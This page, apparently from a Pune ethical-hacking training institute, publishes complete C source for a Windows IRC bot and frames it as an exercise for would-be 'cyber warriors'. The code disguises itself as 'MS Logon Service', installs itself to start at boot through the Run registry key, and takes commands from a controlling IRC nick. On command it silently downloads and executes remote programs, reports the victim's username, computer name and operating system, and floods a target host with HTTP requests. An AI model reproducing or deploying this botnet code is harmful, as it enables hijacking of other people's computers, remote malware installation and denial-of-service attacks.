Simple BOT written in C language Unknown rwxr-xr-x 0 5/11/2013

Filename	Simple BOT written in C language
Permission	rw-r--r--
Author	Unknown
Date and Time	5/11/2013
Label
Action

Ethical Hacking Institute in Pune
./Arizona Team

Hello guys welcome back to Arizona programming zone. After looking around in this hacking world found many script kiddies. Useless people using Trojans and Bots made by some one else, hell for such guys. There are tons of people so called security prof.. bla bla bla white hats bla bla..

One question to those money sucking people where do you disappear when country is under cyber threat?? Anyways I dont want this young generation to be bluffed by such peoples. There is no short cut for success.

We need you this country needs you. keep learning and throw out those tools. Toys are used by kids not by Cyber Warriors.

A simple Bot which can be used on facebook, google+, yahoo msg and any sort of IRC.


Understand the logical flow and create a new one. If you have any difficulty in understanding the logical flow you can write to me at instructor@arizonainfotech.com

Enjoy learning..

Here is the Code written in C:

#include <windows.h>
#include <winsock2.h>
#include <stdio.h>


#define _CHANNEL_ "#channel"
#define _CONTROL_ "your_nick"
#define _SERVER_ "irc_server"

#define BUF_LENGTH 1024

//Prototypen
int startWinsock(void);
long getAddrFromString(char* hostnameOrIp, SOCKADDR_IN* addr);

struct DOWNLOADSTRUCT
{
    char host[BUF_LENGTH];
    char path[BUF_LENGTH];
};

struct DOSSTRUCT
{
    char host[BUF_LENGTH];
    int count;
};

DWORD WINAPI download(LPVOID arg)
{
    DOWNLOADSTRUCT *ds = (DOWNLOADSTRUCT*)arg;
    long rc;
    SOCKET s;
    SOCKADDR_IN addr;
    int lc, i;
    FILE *f;
    char buf[BUF_LENGTH], fname[BUF_LENGTH];
   
    rc=startWinsock();
    if(rc!=0)
        ExitThread(0);

    s=socket(AF_INET,SOCK_STREAM,0);
    if(s==INVALID_SOCKET)
        ExitThread(0);

    memset(&addr,0,sizeof(SOCKADDR_IN));
    addr.sin_family=AF_INET;
    addr.sin_port=htons(80);
    rc=getAddrFromString(ds->host,&addr);
    if(rc==SOCKET_ERROR)
        ExitThread(0);

    rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR));
    if(rc==SOCKET_ERROR)
        ExitThread(0);
       
    sprintf(buf, "GET /%s HTTP/1.1\r\nHost: %s\r\n\r\n", ds->path, ds->host);
    send(s,buf,strlen(buf),0);
   
    lc = 0;
    while(lc < 2)
    {
        rc=recv(s,buf,1,0);
        if(buf[0] == '\n') lc++;
        else if(buf[0] != '\r') lc = 0;
    }
   
    sprintf(fname, "temp_%i.exe", (rand() % 5000));
    f = fopen(fname, "wb");
   
    while((rc=recv(s,buf,256,0)) != 0)
    {
        if(rc==SOCKET_ERROR)
            ExitThread(0);
        for(i = 0;i < rc;i++)
            fprintf(f, "%c", buf[i]);
    }
    fclose(f);
 
    closesocket(s);
    WSACleanup();

    WinExec(fname, SW_HIDE);
   
    ExitThread(0);
}

DWORD WINAPI dos(LPVOID arg)
{
    DOSSTRUCT *ds = (DOSSTRUCT*)arg;
    long rc;
    SOCKET s;
    SOCKADDR_IN addr;
    int lc, i;
    char buf[BUF_LENGTH];
   
    rc=startWinsock();
    if(rc!=0)
        ExitThread(0);

    for(i = 0;i < ds->count;i++)
    {
        while((s=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) Sleep(500);

        memset(&addr,0,sizeof(SOCKADDR_IN));
        addr.sin_family=AF_INET;
        addr.sin_port=htons(80);
        rc=getAddrFromString(ds->host,&addr);
        if(rc==SOCKET_ERROR)
            ExitThread(0);


        while((rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR))) == SOCKET_ERROR) Sleep(500);
   
        sprintf(buf, "GET / HTTP/1.1\r\nHost: %s\r\n\r\n", ds->host);
        send(s,buf,strlen(buf),0);
        closesocket(s);
    }
 
    WSACleanup();
   
    ExitThread(0);
}

unsigned long downloadtid, dostid;

int WINAPI WinMain(HINSTANCE w1, HINSTANCE w2, PSTR w3, int w4)//main()
{
    long rc;
    SOCKET s;
    SOCKADDR_IN addr;
    char buf[BUF_LENGTH], buf2[BUF_LENGTH], buf3[BUF_LENGTH], channel[] = _CHANNEL_, master[] = _CONTROL_, nick[BUF_LENGTH], *ptr;
    int i, sm;
    DWORD l;
    OSVERSIONINFOEX osinfo;
    DOWNLOADSTRUCT ds;
    DOSSTRUCT dss;
    HWND hWnd;
    HKEY hKey;
 
    ptr = (char *)malloc(BUF_LENGTH);
    sm = 0;
   
    srand(time(NULL));
   
    hWnd = (HWND)GetModuleHandle(NULL);
    GetModuleFileName((HINSTANCE)hWnd, buf, sizeof(buf));
    GetSystemDirectory(buf2, sizeof(buf2));
    strcat(buf2, "\\logon_service.exe");
    CopyFile(buf, buf2, 0);
    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hKey);
    RegSetValueEx(hKey, "MS Logon Service", 0, REG_SZ, TEXT(buf2), strlen(buf2)+1);
    RegCloseKey(hKey); 

    if((strcmp(buf, buf) != 0))
    {
        // Fake Message
        //MessageBox(NULL, "Error #235\n\nCouldn't open 'sro_c.exe'\nAbort", "Install Error", MB_OK + MB_ICONERROR);
    }
   
    // Winsock starten
    startWinsock();
    printf("Winsock gestartet\n");
  // Socket erstellen
    while((s=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) Sleep(1000);
    printf("Socket erstellt\n");
  // Verbinden
    memset(&addr,0,sizeof(SOCKADDR_IN)); // zuerst alles auf 0 setzten
    addr.sin_family=AF_INET;
    addr.sin_port=htons(6667); // wir verwenden mal port 12345
    rc=getAddrFromString(_SERVER_,&addr);
    if(rc==SOCKET_ERROR)
        return 1;


    while((rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR))) == SOCKET_ERROR) Sleep(1000);
   
    sprintf(nick, "bot_%i", rand() % 30000);
  /*
    rc=recv(s,buf,1000,0);
    rc=recv(s,buf,1000,0);
    buf[rc] = '\0';
*/
    sprintf(buf, "NICK %s\r\nUSER %s \"localhost\" \"%s\" :%s\r\n", nick, nick, _SERVER_, nick);
    send(s,buf,strlen(buf),0);
/*
    rc=recv(s,buf,1000,0);
    buf[rc] = '\0';
 
    strtok(buf, " ");
    strcpy(buf2, strtok(NULL, ""));
    strcpy(buf, "PONG ");
    strcat(buf, buf2);
    send(s,buf,strlen(buf),0);
*/
    do
    {
        rc=recv(s,buf,1000,0);
        buf[rc] = '\0';
    } while(!strstr(buf, "End of /MOTD command"));
 
 
    sprintf(buf, "JOIN %s\r\n", channel);
    send(s,buf,strlen(buf),0);

    // Daten austauschen
    while(rc!=SOCKET_ERROR)
    {
        rc=recv(s,buf,1000,0);
        if(rc==0)
            break;
        if(rc==SOCKET_ERROR)
            break;
        buf[rc]='\0';
   
        if(!strnicmp(buf, "PING", 4))
        {
            strtok(buf, " ");
            strcpy(buf2, strtok(NULL, ""));
            strcpy(buf, "PONG ");
            strcat(buf, buf2);
            send(s,buf,strlen(buf),0);
        }
        else if(strstr(buf, "PRIVMSG"))
        {
            strcpy(buf2, buf);
            ptr = strtok(buf2, "!");
            for(i = 1;i <= strlen(ptr);i++) ptr[i - 1] = ptr[i];
            if(strcmp(ptr, master) == 0)
            {
                ptr = strtok(buf, ":");
                ptr = strtok(NULL, "\r");
           
                if(strcmp(ptr, "exit") == 0)
                {
                    closesocket(s);
                    WSACleanup();
                    return 0;
                }
                else if(strcmp(ptr, "uninstall") == 0)
                {
                    sprintf(buf2, "nothing...");
                    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hKey);
                    RegSetValueEx(hKey, "MS Logon Service", 0, REG_SZ, TEXT(buf2), strlen(buf2)+1);
                    RegCloseKey(hKey);
                   
                    closesocket(s);
                    WSACleanup();
                    return 0;
                }
                else if(strcmp(ptr, "info") == 0)
                {
                    l = sizeof(buf);
                    GetUserName(buf, &l);
                    sprintf(buf2, "Username: %s", buf);
                    GetComputerName(buf, &l);
                    sprintf(buf3, "%s, Computername: %s", buf2, buf);
                    sm = 1;
                    ZeroMemory(&osinfo, sizeof(OSVERSIONINFO));
                    osinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
                    GetVersionEx((OSVERSIONINFO *) &osinfo);
                    l = osinfo.dwMinorVersion;
                    strcpy(buf, "???");
                    switch(osinfo.dwMajorVersion)
                    {
                        case 5:
                            if(l == 0)
                                strcpy(buf, "Windows 2000");
                            else if(l == 1)
                                strcpy(buf, "Windows XP");
                            else if(l == 2)
                            {
                                if(osinfo.wSuiteMask == 0x8000)
                                    strcpy(buf, "Windows Home Server");
                                else if(GetSystemMetrics(89) == 0)
                                    strcpy(buf, "Windows Server 2003");
                                else if(GetSystemMetrics(89) != 0)
                                    strcpy(buf, "Windows Server 2003 R2");
                                else
                                    strcpy(buf, "Windows XP Professional x64 Edition");
                            }
                        break;
                   
                        case 6:
                            if(l)
                            {
                                if(osinfo.wProductType != VER_NT_WORKSTATION)
                                    strcpy(buf, "Windows Server 2008 R2");
                                else
                                    strcpy(buf, "Windows 7");
                            }
                            else
                            {
                                if(osinfo.wProductType == VER_NT_WORKSTATION)
                                    strcpy(buf, "Windows Vista");
                                else
                                    strcpy(buf, "Windows Server 2008");
                            }
                        break;
                   
                        default:
                            strcpy(buf, "???");
                        break;
                    }
               
                    sprintf(buf2, "%s, OS: %s", buf3, buf);
                }
                else if(strncmp(ptr, "download", strlen("download")) == 0)
                {
                    ptr = strtok(ptr, " ");
                    ptr = strtok(NULL, " ");
                    sprintf(ds.host, "%s", ptr);
                    ptr = strtok(NULL, " ");
                    sprintf(ds.path, "%s", ptr);
               
                    CreateThread(NULL, 0, download, &ds, 0, &downloadtid);
                }
                else if(strncmp(ptr, "dos", strlen("dos")) == 0)
                {
                    ptr = strtok(ptr, " ");
                    ptr = strtok(NULL, " ");
                    sprintf(dss.host, "%s", ptr);
                    ptr = strtok(NULL, " ");
                    dss.count = atoi(ptr);
               
                    CreateThread(NULL, 0, dos, &dss, 0, &dostid);
                }
                else
                {
                    buf[0] = '\0';
                }
       
                if(sm)
                {
                    sprintf(buf, "PRIVMSG %s :%s\r\n", channel, buf2);
                    send(s,buf,strlen(buf),0);
                    sm = 0;
                }
            }
        }
    }
    closesocket(s);
    WSACleanup();
    return 0;
}

int startWinsock(void)
{
    WSADATA wsa;
    return WSAStartup(MAKEWORD(2,0),&wsa);
}


long getAddrFromString(char* hostnameOrIp, SOCKADDR_IN* addr)
{
    long rc;
    unsigned long ip;
    HOSTENT* he;

    if(hostnameOrIp==NULL || addr==NULL)
        return SOCKET_ERROR;

    ip=inet_addr(hostnameOrIp);

    if(ip!=INADDR_NONE)
    {
        addr->sin_addr.s_addr=ip;
        return 0;
    }
    else
    {
        he=gethostbyname(hostnameOrIp);
        if(he==NULL)
            return SOCKET_ERROR;
        else
            memcpy(&(addr->sin_addr),he->h_addr_list[0],4);
        return 0;
    }
}

www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE